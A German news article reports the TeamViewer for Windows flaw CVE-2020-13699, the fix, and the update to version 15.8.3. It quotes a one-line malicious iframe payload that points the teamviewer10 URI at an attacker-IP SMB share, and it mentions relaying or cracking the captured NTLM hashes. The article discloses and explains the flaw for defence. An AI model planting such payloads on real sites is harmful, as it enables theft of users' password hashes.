Fehler in TeamViewer kann Hackern erlauben, Systempasswort zu stehlen

TeamViewer hat kürzlich eine hochriskante Sicherheitsanfälligkeit in seiner Desktop-App für Windows behoben, indem eine neue Version seiner Software veröffentlicht wurde, die, wenn sie ausgenutzt wird, es entfernten Angreifern ermöglichen könnte, Ihr Systempasswort zu stehlen und möglicherweise auszunutzen.

Was noch besorgniserregender ist, ist, dass dieser Angriff keine Interaktion des Opfers erfordert und fast automatisch durchgeführt werden kann.

Für diejenigen, die es nicht wissen, TeamViewer ist eine beliebte Softwareanwendung, die von der deutschen Firma TeamViewer GmbH entwickelt wurde, für Fernsteuerung, Desktop-Sharing, Online-Meetings, Webkonferenzen und Dateiübertragungen zwischen Computern.

Es ist verfügbar für Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 und BlackBerry-Betriebssysteme. Es ist auch möglich, auf ein System, das TeamViewer ausführt, mit einem Webbrowser zuzugreifen.

Die schwere Sicherheitsanfälligkeit mit dem Namen CVE-2020-13699 wurde erstmals von Jeffrey Hofmann, einem Sicherheitsforscher von Praetorian, entdeckt. Laut dem Forscher liegt die Sicherheitsanfälligkeit in TeamViewer für Windows in der Art und Weise, wie die Anwendung ihre benutzerdefinierte URI zitiert (Unquoted URI handler).

Der Experte entdeckte, dass das Problem es einem Angreifer ermöglichen könnte, die Software zu zwingen, eine NTLM-Authentifizierungsanfrage an das System des Angreifers weiterzuleiten. Mit anderen Worten, ein Angreifer kann das URI-Schema von TeamViewer von einer Webseite aus zwingen, die Anwendung auf dem System des Opfers dazu zu bringen, eine Verbindung zum vom Angreifer besessenen Remote-SMB-Share herzustellen.

Dies löst den SMB-Authentifizierungsprozess aus, der wiederum den Benutzernamen des Systems und die NTLMv2-hashierte Version des Passworts an die Angreifer weiterleitet.

Um CVE 2020-13699 erfolgreich auszunutzen, muss der Angreifer ein bösartiges iframe auf einer Website einbetten und dann die Opfer dazu bringen, diese bösartig gestaltete URL zu besuchen. Sobald die Opfer auf den Link klicken, wird TeamViewer automatisch seinen Windows-Desktop-Client starten und einen Remote-SMB-Share öffnen.

„Ein Angreifer könnte ein bösartiges iframe in eine Website mit einer gestalteten URL einbetten (iframe src=’teamviewer10: –play \attacker-IPileake.tvs’), das den TeamViewer Windows-Desktop-Client starten und ihn zwingen würde, einen Remote-SMB-Share zu öffnen“, erklärte Jeffrey Hofmann in einem Hinweis.

„Windows wird NTLM-Authentifizierung durchführen, wenn der SMB-Share geöffnet wird, und diese Anfrage kann weitergeleitet werden (mit einem Tool wie Responder) für die Codeausführung (oder erfasst werden für das Knacken von Hashes).“

Diese Sicherheitsanfälligkeit betrifft „URI-Handler teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 und tvvpn1“, sagte Hofmann.

Nach der Offenlegung der Sicherheitsanfälligkeit hat das TeamViewer-Projekt den Fehler behoben, indem es die Parameter, die von den betroffenen URI-Handlern übergeben werden, zitiert hat, z.B. URL:teamviewer10 Protokoll „C:\Program Files (x86)\TeamViewer\TeamViewer.exe“ „%1“.

Um den Fehler zu beheben, sagte TeamViewer in einer Erklärung: „Wir haben einige Verbesserungen im URI-Handling in Bezug auf CVE 2020-13699 implementiert. Vielen Dank, Jeffrey Hofmann von Praetorian, für Ihre Professionalität und für die Einhaltung eines verantwortungsvollen Offenlegungsmodells. Wir sind dankbar, dass Sie sich an uns gewandt haben und dass Sie die Behebung Ihrer Erkenntnisse in der neuesten Version bestätigen konnten.“

Um das Problem zu beheben, hat TeamViewer die Version 15.8.3 veröffentlicht und empfiehlt seinen Benutzern, sofort auf diese Version zu aktualisieren.

Auch lesen - Beste TeamViewer-Alternativen